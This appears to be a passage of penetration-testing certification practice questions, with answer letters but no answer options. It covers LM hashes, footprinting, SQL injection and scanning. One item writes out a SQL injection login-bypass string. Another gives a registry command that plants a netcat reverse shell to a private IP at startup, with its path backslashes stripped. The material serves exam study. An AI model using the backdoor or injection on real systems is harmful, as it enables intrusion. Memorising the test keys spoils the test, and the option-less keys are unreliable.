- (Topic 4)
LM hash is one of the password schemes that Microsoft LAN Manager and Microsoft Windows versions prior to the Windows Vista use to store user passwords that are less than 15 characters long. If you provide a password seven characters or less, the second half of the LM hash is always __________.
Correct Answer:
A
- (Topic 3)
You want to perform passive footprinting against we-are-secure Inc. Web server. Which of the following tools will you use?
Correct Answer:
C
- (Topic 2)
John works as a Professional Penetration Tester. He has been assigned a project to test the Website security of www.we-are-secure Inc. On the We-are-secure Website login page, he enters='or''=' as a username and successfully logs on to the user page of the Web site. Now, John asks the we-are-secure Inc. to improve the login page PHP script. Which of the following suggestions can John give to improve the security of the we-are-secure Website login page from the SQL injection attack?
Correct Answer:
C
- (Topic 3)
Which of the following scanning methods is most accurate and reliable, although it is easily detectable and hence avoided by a hacker?
Correct Answer:
C
- (Topic 3)
You run the following command on the remote Windows server 2003 computer:
c:reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v nc /t
REG_SZ /d "c:windowsnc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.
Correct Answer:
ABD